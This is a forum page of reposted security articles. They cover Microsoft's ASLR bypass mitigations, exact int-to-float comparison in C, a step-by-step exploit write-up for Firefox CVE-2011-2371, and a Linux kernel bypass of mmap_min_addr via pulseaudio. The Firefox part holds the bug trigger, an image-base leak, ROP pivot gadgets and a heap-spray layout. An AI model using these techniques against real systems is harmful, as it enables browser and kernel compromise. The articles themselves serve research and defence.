Everything posted by Nytro

  1. swiat 12 Mar 2014 9:13 AM

We have written several times on this blog about the importance of enabling Address Space Layout Randomization (ASLR) in modern software, because it is a very important defense mechanism that increases the cost of writing exploits and in some cases prevents reliable exploitation. In today's post, we'll go through ASLR one more time to show in practice how valuable it was in mitigating two real exploits seen in the wild, and to suggest solutions for programs not yet equipped with ASLR.

Born with ASLR

ASLR adds a significant hurdle to exploit development, but we realized that a single non-ASLR module loaded into a process can be enough to compromise all of its benefits at once. For this reason, recent versions of the most popular Microsoft programs were designed to enforce ASLR automatically for every module loaded into their process space. Internet Explorer 10/11 and Microsoft Office 2013 run with the full benefits of this mitigation and enforce ASLR randomization natively, without any additional setting, on Windows 7 and above - even for DLLs not originally compiled with the /DYNAMICBASE flag. Customers using these programs therefore already have good native protection; they only need to take care of other potentially targeted programs that do not use ASLR.

ASLR effectiveness in action

Given the importance of ASLR, we take additional steps to close gaps when ASLR bypasses surface at security conferences from time to time, or when they are found used in targeted attacks in the wild. The outcome of this effort is to strengthen protection for earlier versions of Microsoft operating systems and browsers that cannot enforce ASLR natively the way IE 10/11 and Office 2013 can. Some examples of recent updates designed to break well-known ASLR bypasses are shown in the following table.

MS BULLETIN | ASLR BYPASS | REFERENCE
MS13-063 | LdrHotPatchRoutine | http://cansecwest.com/slides/2013/DEP-ASLR%20bypass%20without%20ROP-JIT.pdf - reported at Pwn2Own 2013; works only on Win7 x64
MS13-106 | HXDS.DLL (Office 2007/2010) | http://www.greyhathacker.net/?p=585 - seen used in the wild with IE/Flash exploits (CVE-2013-3893, CVE-2013-1347, CVE-2012-4969, CVE-2012-4792)
MS14-009 | VSAVB7RT.DLL (.NET) | http://www.greyhathacker.net/?p=585 - seen used in the wild with IE exploits (CVE-2013-3893)

We were glad to see these recent ASLR updates pay off against two recent attacks: the Flash exploit found in February (CVE-2014-0502) in some targeted attacks, and a privately reported bug in IE8 (CVE-2014-0324) patched just today. As the code snippets below show, neither exploit would have been effective against fully patched machines running Vista or above with the MS13-106 update installed.

[Screenshot: exploit code for CVE-2014-0502 (Flash) - unsuccessful attempt at an ASLR bypass using HXDS.DLL, fixed by MS13-106. Note: the code also attempts a second ASLR bypass based on Java 1.6.x.]

[Screenshot: exploit code for CVE-2014-0324 (IE8) - unsuccessful attempt at an ASLR bypass using HXDS.DLL, fixed by MS13-106.]

Solutions for non-ASLR modules

The two exploits above teach another important lesson: even though Microsoft libraries are natively compiled with ASLR, and even though we work hard to fix known ASLR gaps in our products, attackers still have opportunities to use third-party DLLs to undermine the ASLR ecosystem. Java 1.6.x is a well-known case: because of the popularity of this software suite, and because it loads an old non-ASLR library (MSVCR71.DLL) into the browser, it became a very popular vector used in exploits to bypass ASLR. Security researchers frequently scan for popular third-party libraries not compiled with /DYNAMICBASE that can enable a bypass; the following list shows just a few common ones.

3rd PARTY ASLR BYPASS | REFERENCE
Java 1.6.x (MSVCR71.DLL) | Very common ASLR bypass used in the wild for multiple CVEs. Note: Java 1.7.x uses MSVCR100.DLL, which supports ASLR.
DivX Player 10.0.2, Yahoo Messenger 11.5.0.228, AOL Instant Messenger 7.5.14.8 | http://www.greyhathacker.net/?p=756 (not seen in real attacks)
DropBox | http://codeinsecurity.wordpress.com/2013/09/09/installing-dropbox-prepare-to-lose-aslr/ (not seen in real attacks)
veraport20.Veraport20Ctl, Gomtvx.Launcher, INIUPDATER.INIUpdaterCtrl | KISA report http://boho.or.kr/upload/file/EpF448.pdf (seen in the wild with CVE-2013-3893)

As noted at the beginning of this post, Internet Explorer 10/11 and Office 2013 are not affected by ASLR bypasses introduced by third-party modules and plugins. Customers still running older versions of Internet Explorer and Office can instead take advantage of two effective tools that can enforce ASLR for any module:

- EMET (Enhanced Mitigation Experience Toolkit): can be used to enable system-wide ASLR or "MandatoryASLR" selectively on any process.
- "Force ASLR" update KB2639308: makes it possible for selected applications to forcibly relocate images not built with /DYNAMICBASE, using Image File Execution Options (IFEO) registry keys.

Conclusions

ASLR bypasses are not vulnerabilities in themselves, since they have to be combined with a real memory corruption vulnerability before an attacker can create an exploit; still, it is nice to see that closing ASLR bypasses can negatively impact the reliability of certain targeted attacks. We encourage all customers to proactively test and deploy the suggested tools when possible, especially for old programs commonly targeted by memory corruption exploits. We expect attackers to continue increasing their focus and research on more sophisticated ASLR bypasses that rely on disclosure of memory addresses rather than on non-ASLR libraries.

- Elia Florio, MSRC Engineering

Source: When ASLR makes the difference - Security Research & Defense - Site Home - TechNet Blogs
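(A side note on the Force ASLR update mentioned above: after installing KB2639308, per-application opt-in goes through an IFEO registry value. The one-liner below is only a hedged illustration - the value name and the 0x100 mask follow the KB's documentation as commonly cited, but the exact registry type and mask should be verified against the KB itself, and "example.exe" is a placeholder:)

rem Hypothetical illustration - verify value name/type/mask against KB2639308.
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\example.exe" /v MitigationOptions /t REG_DWORD /d 0x100 /f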
  2. The perfect int == float comparison

Just to be clear, this post is not going to be about float vs. float comparison. Instead, it will be about trying to compare a floating point value with an integer value in an accurate, precise way. It will also be about why just doing int_value == float_value in some languages (C, C++, PHP, and some others) doesn't give you the result you would expect - a problem which I recently stumbled on when trying to fix a certain library I was using.

UPDATE: Just to make sure we see it in the same way: this post is about playing with bits and floats just for the sake of playing with bits and floats; it's not something you could or should use in anything serious though.

UPDATE 2: There were two undefined behaviours pointed out in my code (one, two) - these are now fixed.

The problem explained

Let's start by demonstrating the problem by running the following code, which compares consecutive integers with a floating point value:

float a = 100000000.0f;
printf("...99 --> %i\n", a == 99999999);
printf("...00 --> %i\n", a == 100000000);
printf("...01 --> %i\n", a == 100000001);
printf("...02 --> %i\n", a == 100000002);
printf("...03 --> %i\n", a == 100000003);
printf("...04 --> %i\n", a == 100000004);
printf("...05 --> %i\n", a == 100000005);

The result:

...99 --> 1
...00 --> 1
...01 --> 1
...02 --> 1
...03 --> 1
...04 --> 1
...05 --> 0

Sadly, this was to be expected in the floating point realm. However, while in this world both 99999999 and 100000004 might be equal to 100000000, this is sooo not true for common sense nor standard arithmetic. Let's look at another example - an attempt to sort a collection of numbers by value in PHP:

<?php
$x = array(
  20000000000000002,
  20000000000000003,
  20000000000000000.0,
);
sort($x);
foreach ($x as $i) {
  if (is_float($i)) {
    printf("%.0f\n", $i);
  } else {
    printf("%d\n", $i);
  }
}

The "sorted" result (64-bit PHP):

> php test.php
20000000000000002
20000000000000000
20000000000000003

Side note: the code above must be executed using 64-bit PHP. 32-bit PHP has integers limited to 32 bits, so the numbers used in the example would exceed their limit and get silently converted to doubles. This results in the following output:

20000000000000000
20000000000000000
20000000000000004

So, what's going on? It all boils down to floats having too little precision for larger integers (this is a good time to look at this and this). For example, the 32-bit float has only 23 bits dedicated to the significand - this means that if an integer value being converted to float needs more than 24 bits to be represented (sic!; keep in mind that floats have an implicit "1" hardcoded at the top position, which is not present in the bit-level representation), it will get truncated - i.e. the least significant bits will be treated as zeroes. In the C case above, the decimal value 100000001 actually requires 27 bits to be properly represented:

0b101111101011110000100000001

However, since only the leading "1" and the following 23 bits fit inside a float, the "1" at the very end gets truncated. This number therefore becomes a different number:

0b101111101011110000100000000

which in decimal is 100000000, and is therefore equal to the float constant 100000000.0f. The same problem exists between 64-bit integers and 64-bit doubles - the latter have only 52 bits dedicated to storing the value.

A somewhat amusing side note

Actually, it gets even better.
Let's rewrite the first code shown above (the C one) to use a loop:

float a = 100000000.0f;
int i;
for (i = 100000000 - 5; i <= 100000000 + 5; i++) {
  printf("%11.1f == %9u --> %i\n", a, i, a == i);
}

As you can see, there are no big changes. Now let's compile it and run it:

>gcc test.c
> a
100000000.0 ==  99999995 --> 0
100000000.0 ==  99999996 --> 0
100000000.0 ==  99999997 --> 0
100000000.0 ==  99999998 --> 0
100000000.0 ==  99999999 --> 0
100000000.0 == 100000000 --> 1
100000000.0 == 100000001 --> 0
100000000.0 == 100000002 --> 0
100000000.0 == 100000003 --> 0
100000000.0 == 100000004 --> 0
100000000.0 == 100000005 --> 0

The result is magically correct! How about we compile it with optimization then?

>gcc test.c -O3
> a
100000000.0 ==  99999995 --> 0
100000000.0 ==  99999996 --> 1
100000000.0 ==  99999997 --> 1
100000000.0 ==  99999998 --> 1
100000000.0 ==  99999999 --> 1
100000000.0 == 100000000 --> 1
100000000.0 == 100000001 --> 1
100000000.0 == 100000002 --> 1
100000000.0 == 100000003 --> 1
100000000.0 == 100000004 --> 1
100000000.0 == 100000005 --> 0

Why is that? Well, in both cases the compiler needs to convert the integer to a float and then compare it with the second float value. This, however, can be done in two different ways:

Option 1: The integer is converted to a floating point value, stored in memory as a 32-bit float and then loaded into the FPU for the comparison; OR (in the case of constants) the integer constant is converted to a 32-bit float constant at compilation time and loaded into the FPU for comparison at runtime.

Option 2: The integer is loaded directly into the FPU for comparison (using the fild FPU instruction or similar).

The difference here comes from the FPU internally operating on larger floating point values with more precision (by default it's 80 bits, though you can change this) - so the 32-bit integer isn't truncated on load, as would happen if it were explicitly converted to a 32-bit float (which, again, has only 24 bits for the actual value). Which option is selected depends strictly on the compiler - its mood, version, options used at compilation, etc.

The perfect comparison

Of course, it's possible to do a perfect comparison. The simplest and most straightforward way is to cast both the int value and the float value to a double before comparing them - a double has a large enough significand to store all possible 32-bit int values. And for 64-bit integers you can use the 80-bit long double, which has exactly 64 bits dedicated to storing the value (plus the ever-present implicit "1").

But that's too easy. Let's try to do the actual comparison without converting to larger types. This can be done in two ways: the "mathematical" way (or: value-specific way) and the encoding-specific way. Both are presented below.

UPDATE 3: Actually there seems to be another way, as pointed out in the comments below and in this reddit post. It does make sense, but I still wonder if there is any counterexample (please note that I'm not saying there is; I'm just saying it never hurts to look for one ;>).

The mathematical way

We basically do it the other way around - i.e. we try to convert the float to an integer. There are a couple of problems here which we need to deal with:

1. The float value might be bigger than INT_MAX or smaller than INT_MIN. In such a case the conversion is undefined and we wouldn't be able to catch it afterwards, so we need to deal with it sooner.
2. The float value might have a non-zero fractional part.
This would get truncated when converting to an int (e.g. (int)1.1f is equal to 1) - we don't want that to happen either.

The implementation of this method (with some comments) is presented below:

#include <stdbool.h>
#include <math.h>

bool IntFloatCompare(int i, float f) {
  // Simple case.
  if ((float)i != f)
    return false;

  // Note: The constant used here CAN be represented as a float. Normally
  //       you would want to use INT_MAX here instead, but that value
  //       *cannot* be represented as a float.
  const float TooBigForInt = (float)0x80000000u;
  if (f >= TooBigForInt) {
    return false;
  }

  if (f < -TooBigForInt) {
    return false;
  }

  float ft = truncf(f);
  if (ft != f) {
    // Not an integer.
    return false;
  }

  // It should be safe to cast float to integer now.
  int fi = (int)f;
  return fi == i;
}

The encoding-specific way

This method relies on decoding the float value from its bit-level representation, checking whether it's an integer, checking whether it is in range, and finally comparing the bits with the integer value. I'll just leave you with the code. If in doubt - refer to this wikipedia page.

#include <stdbool.h>
#include <stdint.h>
#include <string.h>

bool IntFloatCompareBinary(int i, float f) {
  uint32_t fu32;
  memcpy(&fu32, &f, 4);

  uint32_t sign = fu32 >> 31;
  uint32_t exp  = (fu32 >> 23) & 0xff;
  uint32_t frac = fu32 & 0x7fffff;

  // NaN? Inf?
  if (exp == 0xff) {
    return false;
  }

  // Subnormal representation?
  if (exp == 0) {
    // Check if the fraction is 0. If so, it's true if "i" is 0 as well.
    // Otherwise it's false in all cases.
    return (frac == 0 && i == 0);
  }

  int exp_decoded = (int)exp - 127;

  // If the exponent is negative, the number has a fractional part, which means it's not equal.
  if (exp_decoded < 0) {
    return false;
  }

  // If the exponent is above or equal to 31, an int cannot represent such big numbers.
  if (exp_decoded > 31) {
    return false;
  }

  // There is one case where exp_decoded equal to 31 makes sense - when the float is
  // equal to INT_MIN, i.e. the sign is - and the fraction part is 0.
  if (exp_decoded == 31 && (sign != 1 || frac != 0)) {
    return false;
  }

  // What is left is in the range of an integer, but can still have a fractional part.
  // Check if any fraction part would be left.
  uint32_t value_frac = (frac << exp_decoded) & 0x7fffff;
  if (value_frac != 0) {
    return false;
  }

  // Check the value.
  int value = (1 << 23) | frac;
  int shift_diff = exp_decoded - 23;
  if (shift_diff < 0) {
    value >>= -shift_diff;
  } else {
    value <<= shift_diff;
  }

  if (sign) {
    value = -value;
  }

  return i == value;
}

Summary

The above functions can be used for a perfect comparison and they SeemToWork™ (at least on little-endian x86). With some more work both functions could be converted into perfect "less than" comparators, which could then be used to fix the PHP sorting example. But... seriously, just cast the integer and float to something that has more precision ;>

P.S. Did you know that there are exactly 75'497'471 positive integer values that can be precisely represented as a float? Not a lot against the total of 2'147'483'647 positive integers.

Source: gynvael.coldwind//vx.log
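(For completeness, a minimal sketch of the "just cast to a wider type" suggestion from the summary above - this is an illustration, not code from the original post. Every 32-bit int and every 32-bit float converts to a 64-bit double losslessly, so the widening comparison is a one-liner:)

#include <stdbool.h>

// Exact comparison by widening both operands: double's 52-bit significand
// holds any 32-bit int, and every float is exactly representable as a double.
static bool IntFloatCompareViaDouble(int i, float f) {
  return (double)i == (double)f;
}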
  3. Exploiting CVE-2011-2371 (FF reduceRight) without non-ASLR modules

22/02/2012 pakt

CVE-2011-2371 (found by Chris Rohlf and Yan Ivnitskiy) is a bug in Firefox versions <= 4.0.1. It has the interesting property of being a code-exec and an info-leak bug at the same time. Unfortunately, all public exploits targeting this vulnerability rely on non-ASLR modules (like those present in Java). In this post I'll show how to exploit this vulnerability on Firefox 4.0.1/Windows 7 by leaking the image base of one of Firefox's modules, thus circumventing ASLR without any additional dependencies.

The bug

You can see the original bug report with detailed analysis here. To make a long story short, this is the trigger:

xyz = new Array;
xyz.length = 0x80100000;
a = function foo(prev, current, index, array) {
  current[0] = 0x41424344;
}
xyz.reduceRight(a,1,2,3);

Executing it crashes Firefox:

eax=0454f230 ebx=03a63da0 ecx=800fffff edx=01c6f000 esi=0012cd68 edi=0454f208
eip=004f0be1 esp=0012ccd0 ebp=0012cd1c iopl=0  nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000  efl=00010202
mozjs!JS_FreeArenaPool+0x15e1:
004f0be1 8b14c8  mov edx,dword ptr [eax+ecx*8] ds:0023:04d4f228=????????

eax holds a pointer to the "xyz" array and ecx is equal to xyz.length-1. reduceRight visits all elements of the given array in reverse order, so if the read @ 004f0be1 succeeds and we don't crash inside the callback function (foo), the JS interpreter will loop the above code with decreasing values in ecx. The value read @ 004f0be1 is passed to foo() as the "current" argument. This means we can trick the JS interpreter into passing random stuff from the heap to our javascript callback. Notice that we fully control the array's length, and since ecx is multiplied by 8 (bit-shifted left by 3 bits), we can access memory before or after the array by setting/clearing the 29th bit of the length. Neat.

During reduceRight(), the interpreter expects jsval_layout unions:

http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h

typedef union jsval_layout
{
    uint64 asBits;
    struct {
        union {
            int32 i32;
            uint32 u32;
            JSBool boo;
            JSString *str;
            JSObject *obj;
            void *ptr;
            JSWhyMagic why;
            jsuword word;
        } payload;
        JSValueTag tag;
    } s;
    double asDouble;
    void *asPtr;
} jsval_layout;

To be more specific, we are interested in the "payload" struct. Possible values for "tag" are:

http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h

JS_ENUM_HEADER(JSValueType, uint8)
{
    JSVAL_TYPE_DOUBLE    = 0x00,
    JSVAL_TYPE_INT32     = 0x01,
    JSVAL_TYPE_UNDEFINED = 0x02,
    JSVAL_TYPE_BOOLEAN   = 0x03,
    JSVAL_TYPE_MAGIC     = 0x04,
    JSVAL_TYPE_STRING    = 0x05,
    JSVAL_TYPE_NULL      = 0x06,
    JSVAL_TYPE_OBJECT    = 0x07,
...
JS_ENUM_HEADER(JSValueTag, uint32)
{
    JSVAL_TAG_CLEAR     = 0xFFFF0000,
    JSVAL_TAG_INT32     = JSVAL_TAG_CLEAR | JSVAL_TYPE_INT32,
    JSVAL_TAG_UNDEFINED = JSVAL_TAG_CLEAR | JSVAL_TYPE_UNDEFINED,
    JSVAL_TAG_STRING    = JSVAL_TAG_CLEAR | JSVAL_TYPE_STRING,
    JSVAL_TAG_BOOLEAN   = JSVAL_TAG_CLEAR | JSVAL_TYPE_BOOLEAN,
    JSVAL_TAG_MAGIC     = JSVAL_TAG_CLEAR | JSVAL_TYPE_MAGIC,
    JSVAL_TAG_NULL      = JSVAL_TAG_CLEAR | JSVAL_TYPE_NULL,
    JSVAL_TAG_OBJECT    = JSVAL_TAG_CLEAR | JSVAL_TYPE_OBJECT
} JS_ENUM_FOOTER(JSValueTag);

Does this mean we can only read the first dwords of pairs (d1,d2) where d2=JSVAL_TAG_INT32 or d2=JSVAL_TYPE_DOUBLE? Fortunately for us, no.
Observe how the interpreter checks whether a jsval_layout is a number:

http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h

static JS_ALWAYS_INLINE JSBool
JSVAL_IS_NUMBER_IMPL(jsval_layout l)
{
    JSValueTag tag = l.s.tag;
    JS_ASSERT(tag != JSVAL_TAG_CLEAR);
    return (uint32)tag <= (uint32)JSVAL_UPPER_INCL_TAG_OF_NUMBER_SET;

So any pair of dwords (d1, d2) with d2 <= JSVAL_UPPER_INCL_TAG_OF_NUMBER_SET (which is equal to JSVAL_TAG_INT32) is interpreted as a number. And this isn't the end of the good news - check how doubles are recognized:

static JS_ALWAYS_INLINE JSBool
JSVAL_IS_DOUBLE_IMPL(jsval_layout l)
{
    return (uint32)l.s.tag <= (uint32)JSVAL_TAG_CLEAR;
}

This means that any pair (d1,d2) with d2 <= 0xffff0000 is interpreted as a double-precision floating point number. It's a clever way of saving space, since doubles with all exponent bits set and a nonzero mantissa are NaNs anyway, so rejecting doubles greater than 0xffff 0000 0000 0000 isn't really a problem - we are just throwing out NaNs.

Leaking the image base

Knowing that most values read off the heap are interpreted as doubles in our javascript callback (function foo above), we can use a library like JSPack to decode them into byte sequences.

var leak_func = function bleh(prev, current, index, array) {
  if (typeof current == "number") {
    mem.push(current); // decode with JSPack later
  }
  count += 1;
  if (count >= CHUNK_SIZE/8) {
    throw "lol"; // stop dumping
  }
}

Notice that we verify the type of "current". This is necessary because if we encounter a jsval_value of type OBJECT, manipulating it later will cause an undesired crash. Having a chunk of memory, we still need to comb it for values revealing the image base of mozjs.dll (the module implementing reduceRight). Good candidates are pointers to functions in the .code section, or pointers to data structures in .data, but how do we find them? After all, they change with every run because of the varying image base. By examining dumped memory manually, I noticed that it's always possible to find a pair of pointers (with fixed RVAs) into the .data section, differing by a constant (0x304), so a simple algorithm is to sequentially scan pairs of dwords, check if their difference is 0x304, and use their (known) RVAs to calculate mozjs' image base (image_base = ptr_va - ptr_rva). It's a heuristic, but it works 100% of the time.

Taking control

Assume we are able to pass a controlled jsval_layout with tag=JSVAL_TYPE_OBJECT to our JS callback. Here's what happens after executing "current[0]=1" if the "payload.ptr" field points to an area filled with \x88:

eax=00000001 ebx=00000009 ecx=40000004 edx=00000009 esi=055101b0 edi=88888888
eip=655301a9 esp=0048c2a0 ebp=13801000 iopl=0  ov up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b  efl=00010a06
mozjs!js::mjit::stubs::SetElem<0>+0xf9:
655301a9 8b4764  mov eax,dword ptr [edi+64h] ds:002b:888888ec=????????

0:000> k
ChildEBP RetAddr
0048c308 6543fc4c mozjs!js::mjit::stubs::SetElem<0>+0xf9 [...js\src\methodjit\stubcalls.cpp @ 567]
0048c334 65445d99 mozjs!js::InvokeSessionGuard::invoke+0x13c [...\js\src\jsinterpinlines.h @ 619]
0048c418 65445fa6 mozjs!array_extra+0x3d9 [...\js\src\jsarray.cpp @ 2857]
0048c42c 65485221 mozjs!array_reduceRight+0x16 [...\js\src\jsarray.cpp @ 2932]

We are using \x88 as a filler so that every pointer taken from that area is equal to 0x88888888.
Since the highest bit is set (and the pointer points to kernel space), every dereference will cause a crash, and we will notice it under a debugger. Using low values like 0x0c as a filler during exploit development can make us miss crashes if 0x0c0c0c0c happens to be mapped.

It seems we can control the value of edi. Let's see if it's of any use:

0:000> u eip l10
mozjs!js::mjit::stubs::SetElem<0>+0xf9 [...\js\src\methodjit\stubcalls.cpp @ 567]:
655301a9 8b4764     mov eax,dword ptr [edi+64h]
655301ac 85c0       test eax,eax
655301ae 7505       jne mozjs!js::mjit::stubs::SetElem<0>+0x105 (655301b5)
655301b0 b830bb4965 mov eax,offset mozjs!js_SetProperty (6549bb30)
655301b5 8b54241c   mov edx,dword ptr [esp+1Ch]
655301b9 6a00       push 0
655301bb 8d4c2424   lea ecx,[esp+24h]
655301bf 51         push ecx
655301c0 53         push ebx
655301c1 55         push ebp
655301c2 52         push edx
655301c3 ffd0       call eax
655301c5 83c414     add esp,14h
655301c8 85c0       test eax,eax

That's exactly what we need - the value from [edi+64h] (edi is controlled) is a function pointer called @ 655301c3. Where does the edi value come from?

0:000> u eip-72 l10
mozjs!js::mjit::stubs::SetElem<0>+0x87 [...\js\src\methodjit\stubcalls.cpp @ 552]:
65530137 8b7d04       mov edi,dword ptr [ebp+4]
6553013a 81ffb05f5e65 cmp edi,offset mozjs!js_ArrayClass (655e5fb0)
65530140 8b5c2414     mov ebx,dword ptr [esp+14h]
65530144 7563         jne mozjs!js::mjit::stubs::SetElem<0>+0xf9 (655301a9)

edi=[ebp+4], where ebp is equal to payload.ptr in our jsval_layout union. It's now easy to see how to control EIP: trigger SetElem on a controlled jsval_layout union (by executing "current[0]=1" in the JS callback of reduceRight), with tag=JSVAL_TYPE_OBJECT and ptr=PTR_TO_CONTROLLED_MEM, where [CONTROLLED_MEM+4]=NEW_EIP. Easy.

Since ASLR is not an issue (we already have mozjs' image base), we can circumvent DEP with return oriented programming. With mona.py it's very easy to generate a ROP chain that will allocate a RWX memory chunk. From that chunk we can run our "normal" shellcode, without worrying about DEP.

!mona rop -m "mozjs" -rva

"-m" restricts the search to just mozjs.dll (the only module with a known image base); "-rva" generates a chain parametrized by the module's image base. I won't paste the output, but mona is able to find a chain that uses VirtualAlloc to change memory permissions to RWX.

There's only one problem: in order to use that chain, we need to control the stack. During the call @ 655301c3, we don't. Fortunately, we do control EBP, which is equal to the layout.ptr field of our fake object. The first idea is to use any function's epilogue:

mov esp, ebp
pop ebp
ret

as a pivot, but notice that RET will transfer control to the address stored in [ebp+4], and since:

65530137 8b7d04 mov edi,dword ptr [ebp+4]

that would mean [ebp+4] has to be both a return address and a pointer to a function pointer called later @ 655301c3. We have to modify EBP before copying it to ESP. Noticing that during SetElem the property's id is passed in EBX as 2*id+1 (when executing "current[id] = ..."), it's easy to pick a good gadget:

// 0x68e7a21c, mozjs.dll
// found with mona.py
ADD EBP,EBX
PUSH DS
POP EDI
POP ESI
POP EBX
MOV ESP,EBP //(1)
POP EBP     //(2)
RETN

This will offset EBP by a controlled ODD value. Unicode chars in JS are two bytes each, so it's better to have EBP aligned to 2. We can realign ESP by pivoting again with the new EBP value popped @ (2) and executing the same gadget from line (1).
This is how our fake object has to look:

[Diagram from the original post: byte layout of the fake object - pivot_va at offset 0, ptr at offset 4 pointing back into the object, a 00/new_ebp/mov_esp_ebp/00 sequence at offsets 8-17, new_ebp2 at offset 18, followed by the ROP chain and the normal shellcode.]

pivot_va - address of the gadget above
new_ebp - value popped at (2), used to realign the stack to 2
mov_esp_ebp - address of (1)
new_ebp2 - new value of EBP after executing (2) for the second time, not used
ROP - generated ROP chain changing memory perms
normal shellcode - message box shellcode by Skylined

Spraying

Here's a nice diagram (asciiflow FTW) describing how we are going to arrange (or attempt to arrange) things in memory:

[ASCII diagram from the original post: the first half of the spray region is filled with jsval_layout unions (tag 0xffff0007) whose ptr fields all point into the second half, which is filled with fake objects; aiming at the middle of the first half leaves a margin of error on either side.]

Our spray will consist of two regions. The first one will be filled with jsval_layout unions, with tag=0xffff0007 (JSVAL_TYPE_OBJECT) and ptr pointing to the second region, which is filled with the fake objects described above. If you run the PoC exploit on Windows XP, this is how (most likely) the heap is going to look:

[screenshot of the heap layout]

Zooming into one of the 1MB chunks:

[screenshot]

Notice how our payload is aligned to a 4KB boundary. This is because of how the spray is implemented: unicode strings are stored in an array. The beginning of the array is used to store metadata, and the actual data starts @ +4KB. It's also useful to note that older versions of FF have a bug related to rounding allocation sizes which, in effect, allocates too much memory for objects (including strings), so instead of nicely aligned strings in the array we will get strings interleaved with chunks containing NULL bytes (I'll explain why this isn't a problem in a sec.). This is how the fake objects from the second part of the spray look:

[screenshot]

The four NOPs at the bottom mark the end of mona's ROP chain.

Putting it all together

1. Leak mozjs' image base, as described above.
2. Spray the heap with JS, as described above.
3. Note where the spray starts in memory across different OSes. Different versions of the exploit should use OS-specific constants for calculating the array length used in reduceRight().
4. Calculate the length of the array (xyz in the trigger PoC) so that the first dereference happens in the middle of the first half of the spray. Aiming at the middle gives us the biggest possible margin of error - if the spray's starting address deviates from the expected value by less than size/2, it shouldn't affect our exploit.
5. Trigger the bug. Inside the JS callback, trigger SetElem by executing "current[4]=1". In case of a JS exception (TypeError: current is undefined), change the array's length and continue. These exceptions are caused by the NULL areas between strings. Encountering them isn't fatal, because the JS interpreter sees them as "undefined" values and throws us a JS exception instead of crashing.
6. See a nice messagebox confirming success.

Limitations

The PoC exploit assumes (like all other public exploits for this bug) that the heap is not polluted by previous allocations. This is a bit unrealistic, because the most common "use-case" is that the victim clicks a link leading to the exploit, meaning the browser is already running and most likely has many tabs already opened. In that situation our spray probably won't be a continuous chunk of memory, which will lead to problems (crashes). Assuming that the PoC is the first and only page opened in Firefox, the probability of success (running shellcode) depends on how long we need to search for mozjs' image base. The longer it takes, the more trash gets accumulated on the heap, resulting in more "discontinuities" in the spray region.

Get the PoC here.

Source: Exploiting CVE-2011-2371 (FF reduceRight) without non-ASLR modules | GDTR
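(The pointer-pair heuristic from the "Leaking the image base" section above boils down to a few lines of C; here is a hedged sketch of it. The RVA constant is a placeholder - the post does not give the real one, which would come from the targeted mozjs.dll build:)

#include <stdint.h>
#include <stddef.h>

/* Scan leaked heap dwords for two .data pointers that differ by 0x304,
   then recover the module base: image_base = ptr_va - ptr_rva.
   PTR_RVA is hypothetical. */
#define PTR_RVA 0x000E0000u /* placeholder */

static uint32_t find_mozjs_base(const uint32_t *dump, size_t n)
{
    for (size_t i = 0; i + 1 < n; i++) {
        if (dump[i + 1] - dump[i] == 0x304)
            return dump[i] - PTR_RVA;
    }
    return 0; /* not found */
}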
  4. Bypassing Linux' NULL pointer dereference exploit prevention (mmap_min_addr)

EDIT3: Slashdot, the SANS Institute, Threatpost and others have a story about an exploit by Bradley Spengler which uses our technique to exploit a null pointer dereference in the Linux kernel.
EDIT2: As of July 13th 2009, the Linux kernel integrates our patch (2.6.31-rc3). Our patch also made it into -stable.
EDIT1: This is now referenced as a vulnerability and tracked as CVE-2009-1895.

NULL pointer dereferences are a common security issue in the Linux kernel. In the realm of userland applications, exploiting them usually requires being able to somehow control the target's allocations until you get page zero mapped, and this can be very hard. In the paradigm of locally exploiting the Linux kernel, however, nothing (before Linux 2.6.23) prevented you from mapping page zero with mmap() and crafting it to suit your needs before triggering the bug in your process' context. Since the kernel's data and code segments both have a base of zero, a null pointer dereference would make the kernel access page zero - a page filled with bytes under your control. Easy.

This used to not be the case back in Linux 2.0, when the kernel's data segment's base was above PAGE_OFFSET and the kernel had to explicitly use a segment override (with the fs selector) to access data in userland. The same rough idea is now used in PaX/GRSecurity's UDEREF to prevent exploitation of "unexpected to userland kernel accesses" (it actually makes use of an expand-down segment instead of a PAGE_OFFSET segment base, but that's a detail).

Kernel developers tried to solve this issue too, but without resorting to segmentation (which is considered deprecated and is mostly not available on x86_64) and in a portable (cross-architecture) way. In 2.6.23 they introduced a new sysctl, called vm.mmap_min_addr, which defines the minimum address you can request a mapping at. Of course, this doesn't solve the complete issue of "to userland" pointer dereferences, and it also breaks the somewhat useful feature of being able to map the first pages (this breaks Dosemu, for instance), but in practice it has been effective enough to make exploitation of many vulnerabilities harder or impossible.

Recently, Tavis Ormandy and myself had to exploit such a condition in the Linux kernel. We investigated a few ideas, such as:

- using brk()
- creating a MAP_GROWSDOWN mapping just above the forbidden region (usually 64K) and segfaulting the last page of the forbidden region
- obscure system calls such as remap_file_pages
- putting memory pressure on the address space to let the kernel allocate in this region
- using the MMAP_PAGE_ZERO personality

All of them without any luck at first. The LSM hook responsible for this security check was correctly called every time. So what does the default security module do in cap_file_mmap? This is the relevant code (in security/capability.c on recent versions of the Linux kernel):

if ((addr < mmap_min_addr) &&
    !capable(CAP_SYS_RAWIO))
        return -EACCES;
return 0;

This means a process with CAP_SYS_RAWIO can bypass the check. And how can we get our process to have this capability? By executing a setuid binary, of course! So we set the MMAP_PAGE_ZERO personality and execute a setuid binary. Page zero will get mapped, but the setuid binary is executing and we don't have control anymore. So, how do we get control back?
Using something such as "/bin/su our_user_name" could be tempting: while it would indeed give us control back, su drops privileges before handing control back (it'd be a vulnerability otherwise!), so the Linux kernel will make the exec fail in the cap_file_mmap check (due to the MMAP_PAGE_ZERO personality). What we need is a setuid binary that will give us control back without going through exec. We found such a setuid binary, installed on many desktop Linux machines by default: pulseaudio. pulseaudio drops privileges and lets you specify a library to load through its -L argument. Exactly what we needed!

Once we have one page mapped in the forbidden area, it's game over. Nothing prevents us from using mremap to grow the area and mprotect to change our access rights to PROT_READ|PROT_WRITE|PROT_EXEC. So this completely bypasses the Linux kernel's protection.

Note that apart from this problem, the mere fact that MMAP_PAGE_ZERO is not in the PER_CLEAR_ON_SETID mask, and is thus allowed when executing setuid binaries, can be a security issue in itself: being able to map page zero in a process with euid=0, even without controlling its content, could be useful when exploiting a null pointer vulnerability in a setuid application. We believe that the correct fix for this issue is to add MMAP_PAGE_ZERO to the PER_CLEAR_ON_SETID mask.

PS: Thanks to Robert Swiecki for some help while investigating this.

Posted by Julien Tinnes at 11:37 AM

